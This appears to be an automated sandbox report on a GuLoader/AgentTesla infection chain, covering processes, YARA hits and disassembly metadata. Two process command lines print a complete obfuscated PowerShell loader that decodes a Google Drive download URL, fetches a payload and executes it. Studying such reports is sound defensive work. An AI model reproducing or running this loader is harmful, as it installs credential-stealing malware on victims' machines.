Utru:Ob,lsfUnparoEnkelrAfslreOpfunc Sulfo PariuFilm,nR.licsUranoesandol,nder=ingvo(Staa.c QuadmGeo.hdAft n Pi.ds/AnkomcRader Brunl$ ModiD orsi JarglN.outaBa ekmKendei BensnGastra DdsdtSlingi Ast.oDushsnRedhe).ikke ');Spelean (Selvstarterens ' Konk$OncotgTiltalforudoModsvbHavegaOvarilHeadr:GraciAfuggin redstMarinrPedefoGliffpNi,eloAn.ermG otioAlkovr Pic.f Ud,siReklas BetjmAce,oeUnivenAdvok=Sl.ve$Sca hE Afmal IbizlFlestoLigulkRoistoBloodmDraaboAn,lytRef,oi Und.vMonum2.jemo4 .all2Bagdr.Immu.se ogrprejsnlLeg mi TalktCrino(Hush.$ An,iiKlimanzw ebtHandeeObserrblow.s,trgkeConvesNor esCro siTilsvoMilianpatriaFur,dlIti,e)opsmn ');$Ellokomotiv242=$Antropomorfismen[0];Spelean (Selvstarterens 'Samov$Unsa.gGroovlCabacoeart b MeanaCensolTr.al:AlkohP Int,r FugtaBacacePervrf ForkeFa,ilc Micrt,lostuOkkups Ungk=Haga.NHjrese,ktenwWadse-pearlOAccipb KalijcommoeundercU rivt Rest Pic,pSLig,ey D,ivsS,lutt ScleeEnchimUnd.f.kreplNTel.meJewe t Lods. FremW Nav eC,iefbfortoCAgglulF.skeiSnve,e lownnDkk.ntFo,st ');Spelean (Selvstarterens ' Mado$Term.PHj rnrUdeluaPhloreEtiotfKolloe Ma kc ,etat AflaunoncosOpfin.AnthoHF dtleSkrntaRettedLdrebeEctalrLophisBes s[Palme$ S ilY,rogreKredslLavsplMaskeo rintw,yocofFor,riNa,plsStranhBr.vt] thal= Morp$ForbiU Doglv Foroe HjbelSeec.k IngloEpanom.istinGr.veeValga ');$Alfilerilla=Selvstarterens 'InwrePTakserGrilna,ilare FlipfF,lthe UnthcEvo.et BubbuSkitss fagb.ServiDFluo,oDiamawbr.oknHomo lSewedo ,orta Zinkd A toFPehu iIngemlBeva eDoksa( inde$ Be.aEPreadlHvilkl Thirosal,ikStoleoPerism UnstoSkaaltGluttis.nglvOverf2 rntt4Eta,e2Havva, Ri,e$Nys,aLSadomoTri,akUnbacaLegarlBeskiofl.shsbrynjcTilloiH.acil Ammil .raua SrittTodkkofeedsr Bejd8Fritu6Paagr)Und r ';$Alfilerilla=$forecounsel[1]+$Alfilerilla;$Lokaloscillator86=$forecounsel[0];Spelean (Selvstarterens 'Raa.t$Expolg ApoilKochlo OmelbVeg,eaSdebaljuvel:EngelIFactun Lr naStrunkParaptFinnsi KlipvPreint,elec2Arb j5Udvi.5hydro=Logog(For dTSwordeP ikesL,kshtKilde-A,ostPDispeaCatentsikkehModne Urine$Glac,LDaityoStik,kAfsmiaAircrlSkn aoOver.sCannicPaleoiMeditlForbrl LogiaIn lutDismioUndogrKom,l8Hastv6montr)Retra ');while (!$Inaktivt255) {Spelean (Selvstarterens 'Thion$Lega,g .haslhverdoel,ktbEkspoaHngenlStemn:Sm.arK.erverOccasaUrnfinSejtrs Bat.s BlodtTosteiWaterlQ atrlTatoveSheatt Hand= u,ds$JivartElastr DestuFornie,nlgs ') ;Spelean $Alfilerilla;Spelean (Selvstarterens ' NonfSKompethaglba certrSubtetAbati-AlminSMidirlKartoeP,rioeKommapAjas. do,b4Hand. ');Spelean (Selvstarterens ' ini$CronigGoyadlAfmelosidebb TremaRegnelUnfig: MiniIMartrnV,yeuaH.stekTearltBilleiUri ovNon,ptPekes2Hemip5 att5Pa.om=Strep(StatfTYatageUnexpsTextutEjend-UntenP Jaz.aPosittkontihFrema Logo,$gyngeLBl.sto ranskTho.aa Her.ltursioSonebsInfamcBoghviTaffelAng sl StreaAfbudt,fteroDervir Unor8Patt,6Nonpo)Serum ') ;Spelean (Selvstarterens 'Latif$Delefg BlomlUdvikoK.empb .enga DoublVa,tl:Al.rmBkardiaHypopr papenN ctie FurnsMa.sekUm ddeTeks,fUnobnuUnpallbedemd,ounteNonac2 Epop8Englo= ,air$ Bagtg SupelGenetoFordubFunktaBagtalH dro:.ikkeLTortenTyngdt CasaaFranagskrmaeAsym rChoro+Chrom+Likvi%Progr$gymnaA SlannP,ttotwh.ner .atao Fla pupaatoU,dermBart oModenrAa saf RaahiOvolisHeathmAfdkkeTensonTimey. SkuecRenteo DrikuCircun OmdetShawl ') ;$Ellokomotiv242=$Antropomorfismen[$Barneskefulde28];}Spelean (Selvstarterens 'Uncom$Pyromg Fat,l nildoMinerbT,ansaUdskylNorm.:Fest S Bawde HornaD,ants Gedeh BusheFuldmlMartilYoginsRet.a1Stren Bille=Polym rapG Fl seSofavtMhto -,prngCTho noBydelnFinurt,ebreeRockanevangtAntil urali$RadilL Li io AlumkKeratadataslRaaklo B resTrinncUfo,siS.perlSedgylRen gaSorgltCompro UnivrB.lli8Sciss6Pupil ');Spelean (Selvstarterens ' Over$ HiergAgg,als.pieoRe labTekstaStjerlRe ns:SalutPUfuldrOpli,oPricecNedtrl ChyliRadi nTrunkeRende Breto=Rumsk Gipsp[Ge.etSTropeyClaspsSaanit ar eeBernym tdpu.TerroC fhugoBrsspn CanovDepoleBade rdokumtAfsk,] Man.:Firet:Bee rF reesrLibraoUnri.mSandkBE.pyea SacrsLflaseLsg.g6Mesod4Fed.kSOsmortPfef.rDetoniFilehnustadgSpejl(Stald$MesosS Metae prawaCo agsHomo,hdelpheCacoclKorjalTel.ps Dros1Hazar) Bedd ');Spelean (Selvstarterens 'Unrea$Paahogforb.lPityroU,bytb ChifaSadislmod,l:ClarnC TarmoM,almr cinun tapleForm.tDomnrtDo,er1 F,go4.rrep7Syste Presf=,dsla Sko,s[SprogS NoneyJailes Kompt ZealeS,gekmAnoma.FluidTArbe.eerhvexgymnatLrred.Ne riEinternIntercTrefao Y.nddBakteiStampn Sc lgUnder].inas:Pereg:WaggoAKildeSProtoCCo,nhI PresISkovs.Tu.soG AromeSubpetchau.S Luxet U sir.hasmimlke.n AnnegUdpo,(Afpri$pakslP WhinrJowino LindcMedicl JackiBlindnUnhareFalka)Vensk ');Spelean (Selvstarterens 'T age$ fletgFase.lRa,ghoFanc,bMultiaSemigl ict:PeepsPGafleaArbact ,pdee L njlSus.elOrdreuClithlStereaUnpro=Tegle$KukulCHolmgoC,ummr Af,enForfie Lacht Umbrt ty.i1Tr.mp4Foo.g7Korst.MarkisBa,tuu Shicbestras OdontTag tr Discitripen fromgSo de( uspi3 je l0Co,ro5Bygge1Faktu6Surmi4Pepto,Bor.e2Burro9nedsl0Klved5Helbr4 Orga)Under ');Spelean $Patellula;"
                                                      Imagebase:0x7ff788560000
                                                      File size:452'608 bytes
                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000001.00000002.2313093176.000001D96966F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:2
                                                      Start time:06:48:48
                                                      Start date:24/04/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7699e0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:3
                                                      Start time:06:48:50
                                                      Start date:24/04/2024
                                                      Path:C:\Windows\System32\cmd.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Aptychus.Whi && echo $"
                                                      Imagebase:0x7ff78de10000
                                                      File size:289'792 bytes
                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:4
                                                      Start time:06:48:59
                                                      Start date:24/04/2024
                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Tarboosh = 1;$Ldreforvaltningen='Substrin';$Ldreforvaltningen+='g';Function Selvstarterens($Journal){$Nomadeinvasionens165=$Journal.Length-$Tarboosh;For($Effectible=5; $Effectible -lt $Nomadeinvasionens165; $Effectible+=(6)){$Lagringsformers+=$Journal.$Ldreforvaltningen.Invoke($Effectible, $Tarboosh);}$Lagringsformers;}function Spelean($Surmaster){. ($Reproduktionsteknikkens) ($Surmaster);}$Uvelkomne=Selvstarterens 'PlummMSkul oPolerz,oliliOvulalbestylvi.uiagen.e/Bat.e5Vandp. ouse0Bas,e Nove(AntipW nyrei A.jenPrv.tdA.auaoAflgnw refosPulve Sty,kNPlyssTDds y Super1 Renl0Overb.Weste0b ned; catu LivreWAcqueiSpeaknMyo,o6ran e4 Sn g;Luthe Kintx rose6Photo4Bef t; odke AlgerrPimpsv Feis: nge1Eryth2South1 Over.Flag 0F,rce)debug AmeriG ,arseRotuncFloppkKokleofysio/kopif2Konom0Tipti1Lag.r0Kalku0Opret1S ksk0 A.cu1Unspr turbFstfroiImpe.rWhor.eMa sifUnid,oLand.xNonf /Doket1Sikke2vrang1 Deci.Mesom0 L,ee ';$Yellowfish=Selvstarterens 'G undUDimmosAflire,onharIncel- FradAD.utog R.coe.orksn,erdetHalen ';$Ellokomotiv242=Selvstarterens 'Falkeh elvetAdmirtSyge.pnyanls Th.n:Tugt / Lepi/A.pasdSbr dr Anchis kkevSupereFo.tm.BreasgRarefo Fonlo Bageg CapslBeforeAlkoh.Granic,ejrsoRecemmplate/ VaskuTeknocR.llo?ItczeeRescuxElevap VulsoUd,karDermatIn si=EpilodCrampoLuksuw BortnT rmilApheloNe gaa dtoed cams&Nonadi GlumdNoi.e=Amill1Skrivx QuinC .nsvK Kv.kkBro.hDSlovaLG nerKPupilk thuriBoatlJmortagHydroTkr,ptCsla p2FipskNV ndu2Aands8HellehdruesjCatholSlagt0U tral ask1det,c9IntruULiderbAquavuStenbxSl.ndJShove6 Avisw Subc9Overt ';$intersessional=Selvstarterens ' Stal>Tidsd ';$Reproduktionsteknikkens=Selvstarterens 'BygniiCha me T.okx ,ned ';$Guiding='Scop124';Spelean (Selvstarterens 'VirksSRiddeeJointtStave-Smr.aCFarmeoCastrnRegistFirmaeMilten G.vetProev F,dst- verP JubbaPeriotKrlhahTvrsk ForeaT,econ:Forma\nedb,B BromiColles pre i.hotodSand,dHydraeSt,mmr Ho,neha,mon.sthe.Unurnt ilatxCo tatAlcon Sylve-Fu,daV B.gsaindbelapparuAars eSabi Ammo,$P,atrG NonruSo ediExtradSrgeri RabunB issgSigna;Spe l ');Spelean (Selvstarterens ' .nneiJave,fDeleg Nonn(Frit.t TekseSocrasLuft.tDani,-Bead.pBalm,aQuiritfi.enhOlymp NonnaTAton,:Dechi\ AadsB rakiiPredesHektai PjatdSkrendprecieUund.rVolleeBre snEquip.Egenpt ashlxEnsilt,here) ultr{ TromeGunnaxPe muiGementS,gne}Ethno;Homes ');$Dilamination = Selvstarterens 'Yunp e ButtckonkahTkkesoNeden Komar% amma .alvpErratpIndhadKolleaMesmetAarboaParap%Konsu\CantoAObfuspBauxit rsenyTod,icConnuhJde vu,heolsfuran.Tabe.WPolsthEmbleiMorbi Trvej& K.nt& Pro, AlgareGashacImpu,hBreako Gte. Coryb$Ciliu ';Spelean (Selvstarterens 'Reabs$ Codeg JdinlRegrao Twi,bfdselaUnco.l Utru:Ob,lsfUnparoEnkelrAfslreOpfunc Sulfo PariuFilm,nR.licsUranoesandol,nder=ingvo(Staa.c QuadmGeo.hdAft n Pi.ds/AnkomcRader Brunl$ ModiD orsi JarglN.outaBa ekmKendei BensnGastra DdsdtSlingi Ast.oDushsnRedhe).ikke ');Spelean (Selvstarterens ' Konk$OncotgTiltalforudoModsvbHavegaOvarilHeadr:GraciAfuggin redstMarinrPedefoGliffpNi,eloAn.ermG otioAlkovr Pic.f Ud,siReklas BetjmAce,oeUnivenAdvok=Sl.ve$Sca hE Afmal IbizlFlestoLigulkRoistoBloodmDraaboAn,lytRef,oi Und.vMonum2.jemo4 .all2Bagdr.Immu.se ogrprejsnlLeg mi TalktCrino(Hush.$ An,iiKlimanzw ebtHandeeObserrblow.s,trgkeConvesNor esCro siTilsvoMilianpatriaFur,dlIti,e)opsmn ');$Ellokomotiv242=$Antropomorfismen[0];Spelean (Selvstarterens 'Samov$Unsa.gGroovlCabacoeart b MeanaCensolTr.al:AlkohP Int,r FugtaBacacePervrf ForkeFa,ilc Micrt,lostuOkkups Ungk=Haga.NHjrese,ktenwWadse-pearlOAccipb KalijcommoeundercU rivt Rest Pic,pSLig,ey D,ivsS,lutt ScleeEnchimUnd.f.kreplNTel.meJewe t Lods. FremW Nav eC,iefbfortoCAgglulF.skeiSnve,e lownnDkk.ntFo,st ');Spelean (Selvstarterens ' Mado$Term.PHj rnrUdeluaPhloreEtiotfKolloe Ma kc ,etat AflaunoncosOpfin.AnthoHF dtleSkrntaRettedLdrebeEctalrLophisBes s[Palme$ S ilY,rogreKredslLavsplMaskeo rintw,yocofFor,riNa,plsStranhBr.vt] thal= Morp$ForbiU Doglv Foroe HjbelSeec.k IngloEpanom.istinGr.veeValga ');$Alfilerilla=Selvstarterens 'InwrePTakserGrilna,ilare FlipfF,lthe UnthcEvo.et BubbuSkitss fagb.ServiDFluo,oDiamawbr.oknHomo lSewedo ,orta Zinkd A toFPehu iIngemlBeva eDoksa( inde$ Be.aEPreadlHvilkl Thirosal,ikStoleoPerism UnstoSkaaltGluttis.nglvOverf2 rntt4Eta,e2Havva, Ri,e$Nys,aLSadomoTri,akUnbacaLegarlBeskiofl.shsbrynjcTilloiH.acil Ammil .raua SrittTodkkofeedsr Bejd8Fritu6Paagr)Und r ';$Alfilerilla=$forecounsel[1]+$Alfilerilla;$Lokaloscillator86=$forecounsel[0];Spelean (Selvstarterens 'Raa.t$Expolg ApoilKochlo OmelbVeg,eaSdebaljuvel:EngelIFactun Lr naStrunkParaptFinnsi KlipvPreint,elec2Arb j5Udvi.5hydro=Logog(For dTSwordeP ikesL,kshtKilde-A,ostPDispeaCatentsikkehModne Urine$Glac,LDaityoStik,kAfsmiaAircrlSkn aoOver.sCannicPaleoiMeditlForbrl LogiaIn lutDismioUndogrKom,l8Hastv6montr)Retra ');while (!$Inaktivt255) {Spelean (Selvstarterens 'Thion$Lega,g .haslhverdoel,ktbEkspoaHngenlStemn:Sm.arK.erverOccasaUrnfinSejtrs Bat.s BlodtTosteiWaterlQ atrlTatoveSheatt Hand= u,ds$JivartElastr DestuFornie,nlgs ') ;Spelean $Alfilerilla;Spelean (Selvstarterens ' NonfSKompethaglba certrSubtetAbati-AlminSMidirlKartoeP,rioeKommapAjas. do,b4Hand. ');Spelean (Selvstarterens ' ini$CronigGoyadlAfmelosidebb TremaRegnelUnfig: MiniIMartrnV,yeuaH.stekTearltBilleiUri ovNon,ptPekes2Hemip5 att5Pa.om=Strep(StatfTYatageUnexpsTextutEjend-UntenP Jaz.aPosittkontihFrema Logo,$gyngeLBl.sto ranskTho.aa Her.ltursioSonebsInfamcBoghviTaffelAng sl StreaAfbudt,fteroDervir Unor8Patt,6Nonpo)Serum ') ;Spelean (Selvstarterens 'Latif$Delefg BlomlUdvikoK.empb .enga DoublVa,tl:Al.rmBkardiaHypopr papenN ctie FurnsMa.sekUm ddeTeks,fUnobnuUnpallbedemd,ounteNonac2 Epop8Englo= ,air$ Bagtg SupelGenetoFordubFunktaBagtalH dro:.ikkeLTortenTyngdt CasaaFranagskrmaeAsym rChoro+Chrom+Likvi%Progr$gymnaA SlannP,ttotwh.ner .atao Fla pupaatoU,dermBart oModenrAa saf RaahiOvolisHeathmAfdkkeTensonTimey. SkuecRenteo DrikuCircun OmdetShawl ') ;$Ellokomotiv242=$Antropomorfismen[$Barneskefulde28];}Spelean (Selvstarterens 'Uncom$Pyromg Fat,l nildoMinerbT,ansaUdskylNorm.:Fest S Bawde HornaD,ants Gedeh BusheFuldmlMartilYoginsRet.a1Stren Bille=Polym rapG Fl seSofavtMhto -,prngCTho noBydelnFinurt,ebreeRockanevangtAntil urali$RadilL Li io AlumkKeratadataslRaaklo B resTrinncUfo,siS.perlSedgylRen gaSorgltCompro UnivrB.lli8Sciss6Pupil ');Spelean (Selvstarterens ' Over$ HiergAgg,als.pieoRe labTekstaStjerlRe ns:SalutPUfuldrOpli,oPricecNedtrl ChyliRadi nTrunkeRende Breto=Rumsk Gipsp[Ge.etSTropeyClaspsSaanit ar eeBernym tdpu.TerroC fhugoBrsspn CanovDepoleBade rdokumtAfsk,] Man.:Firet:Bee rF reesrLibraoUnri.mSandkBE.pyea SacrsLflaseLsg.g6Mesod4Fed.kSOsmortPfef.rDetoniFilehnustadgSpejl(Stald$MesosS Metae prawaCo agsHomo,hdelpheCacoclKorjalTel.ps Dros1Hazar) Bedd ');Spelean (Selvstarterens 'Unrea$Paahogforb.lPityroU,bytb ChifaSadislmod,l:ClarnC TarmoM,almr cinun tapleForm.tDomnrtDo,er1 F,go4.rrep7Syste Presf=,dsla Sko,s[SprogS NoneyJailes Kompt ZealeS,gekmAnoma.FluidTArbe.eerhvexgymnatLrred.Ne riEinternIntercTrefao Y.nddBakteiStampn Sc lgUnder].inas:Pereg:WaggoAKildeSProtoCCo,nhI PresISkovs.Tu.soG AromeSubpetchau.S Luxet U sir.hasmimlke.n AnnegUdpo,(Afpri$pakslP WhinrJowino LindcMedicl JackiBlindnUnhareFalka)Vensk ');Spelean (Selvstarterens 'T age$ fletgFase.lRa,ghoFanc,bMultiaSemigl ict:PeepsPGafleaArbact ,pdee L njlSus.elOrdreuClithlStereaUnpro=Tegle$KukulCHolmgoC,ummr Af,enForfie Lacht Umbrt ty.i1Tr.mp4Foo.g7Korst.MarkisBa,tuu Shicbestras OdontTag tr Discitripen fromgSo de( uspi3 je l0Co,ro5Bygge1Faktu6Surmi4Pepto,Bor.e2Burro9nedsl0Klved5Helbr4 Orga)Under ');Spelean $Patellula;"
                                                      Imagebase:0xd50000
                                                      File size:433'152 bytes
                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000004.00000002.2123886427.0000000008920000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000004.00000002.2125155356.000000000A967000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000004.00000002.2112300960.0000000005ED0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:5
                                                      Start time:06:49:00
                                                      Start date:24/04/2024
                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Aptychus.Whi && echo $"
                                                      Imagebase:0x240000
                                                      File size:236'544 bytes
                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:9
                                                      Start time:06:49:23
                                                      Start date:24/04/2024
                                                      Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                                                      Imagebase:0x850000
                                                      File size:516'608 bytes
                                                      MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.2940602617.0000000022451000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.2940602617.0000000022451000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.2940602617.000000002247B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      Reputation:moderate
                                                      Has exited:false

                                                      Disassembly

                                                      Reset < >

                                                        Executed Functions

                                                        Function 00007FFD9B8ACED6 Relevance: .5, Instructions: 470COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2332787414.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_7ffd9b8a0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: bae88bbddb8adc2b7c174e8e49e3dc1e678870619b82248bf78a33d3085fd262
                                                        • Instruction ID: 7c752774c7187628e2caffbedde3d555810ee9e470f82d7c67150354a7eb3880
                                                        • Opcode Fuzzy Hash: bae88bbddb8adc2b7c174e8e49e3dc1e678870619b82248bf78a33d3085fd262
                                                        • Instruction Fuzzy Hash: ECF1B730A0DA4E8FEBA8DF28D8557E977E1FF58310F04426EE84DC7295DB34A9458B81
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FFD9B8ADC82 Relevance: .5, Instructions: 456COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2332787414.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_7ffd9b8a0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4512443c4d777cb65a19add930b3e9fe6eeb1afe0462ec557f42d2968c79f2a3
                                                        • Instruction ID: cebdef34003dcd843d740a5ba935b18f7ca3501bbbfd5b88459152774b09927f
                                                        • Opcode Fuzzy Hash: 4512443c4d777cb65a19add930b3e9fe6eeb1afe0462ec557f42d2968c79f2a3
                                                        • Instruction Fuzzy Hash: 1DE1E730A09A8E8FEBA8DF28C8657E977D1FF58310F14426ED84DC7295DF74A9418B81
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FFD9B974A75 Relevance: .4, Instructions: 431COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2333704987.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_7ffd9b970000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8593d042746a4c5e3b01938dd4aef0cfecaba64598cbdc461d9dc9f84a9cba6f
                                                        • Instruction ID: 222b926ebb9a8313011eb339e0f79533651098bee7a584975bcc561bec7f0ca0
                                                        • Opcode Fuzzy Hash: 8593d042746a4c5e3b01938dd4aef0cfecaba64598cbdc461d9dc9f84a9cba6f
                                                        • Instruction Fuzzy Hash: 07D15731B1EA8D5FE7A5DBA848A5AB97BE0EF55310B0900FED45CC71E3DA18AD01C351
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FFD9B8A3945 Relevance: .0, Instructions: 49COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2332787414.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_7ffd9b8a0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                        • Instruction ID: 04b822a5e3d45822b76be075df3c081dc68bfd048355e8304278f52f19c5101e
                                                        • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                        • Instruction Fuzzy Hash: F401677121CB0D4FD748EF0CE451AA5B7E0FB99364F10056DE58AC36A5D636E881CB45
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Executed Functions

                                                        Function 078D0638 Relevance: 7.8, Strings: 6, Instructions: 325COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2118512475.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_78d0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'kq$4'kq$$kq$$kq$$kq$$kq
                                                        • API String ID: 0-3289266258
                                                        • Opcode ID: c344de68aa594579b39f888f26bdf620b5cee1b39f129bbc3e9af5021c0d1521
                                                        • Instruction ID: 39f95bf0d92294a8f80bf3ee562db3ce47790716d63dc2faf5556af569ca67e5
                                                        • Opcode Fuzzy Hash: c344de68aa594579b39f888f26bdf620b5cee1b39f129bbc3e9af5021c0d1521
                                                        • Instruction Fuzzy Hash: 97B138B2B0421ADFDB249F69D90067ABBA6EFE5314F14846AD408CF351DB32DC45C7A1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 084F1010 Relevance: 1.5, Strings: 1, Instructions: 281COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2122128189.00000000084F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_84f0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: \V*k
                                                        • API String ID: 0-2107984380
                                                        • Opcode ID: 2809877f979b0830ece8cacc818bb7c7dfd87f0c467e33259953e4619c42a39f
                                                        • Instruction ID: caae70242263ef608372be9445a66398567ddbb979dda5556e4bdf0be3dad0de
                                                        • Opcode Fuzzy Hash: 2809877f979b0830ece8cacc818bb7c7dfd87f0c467e33259953e4619c42a39f
                                                        • Instruction Fuzzy Hash: 90B14870E00249CFDB15CFA9C98579EBBF2AF88315F14813EE915AB255EB749842CB81
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 084F18E0 Relevance: .3, Instructions: 266COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2122128189.00000000084F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_84f0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: da2df0569c867cedaa8d0c50473f58616f0832fe25b6941fee1da239026c8327
                                                        • Instruction ID: 0b53a8a2a1b24b73954d4820407d957864004f9b447ea14f2a7e6a35e58f7aa7
                                                        • Opcode Fuzzy Hash: da2df0569c867cedaa8d0c50473f58616f0832fe25b6941fee1da239026c8327
                                                        • Instruction Fuzzy Hash: 2EB15C70E00209CFDB11CFA9C9817AEBBF2AF88315F14853ED915AB355EB749841CB81
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 078D8C30 Relevance: 10.8, Strings: 8, Instructions: 769COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2118512475.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_78d0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'kq$4'kq$4'kq$4'kq$4'kq$4'kq$x.wk$-wk
                                                        • API String ID: 0-1372607265
                                                        • Opcode ID: d0641133426818adfecafd8a8f60801f3ac599f79a24746ca03fe247b23de6b6
                                                        • Instruction ID: 74281be4b937c2fa09e16729d01b01d98f3cd1894efdb615102087ae6167278b
                                                        • Opcode Fuzzy Hash: d0641133426818adfecafd8a8f60801f3ac599f79a24746ca03fe247b23de6b6
                                                        • Instruction Fuzzy Hash: 9A6281B0A00219CFDB24DF58C954BAABBB2FF95314F1084A9D909AB755CB31EC85CF91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 078DD958 Relevance: 10.5, Strings: 8, Instructions: 545COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2118512475.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_78d0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
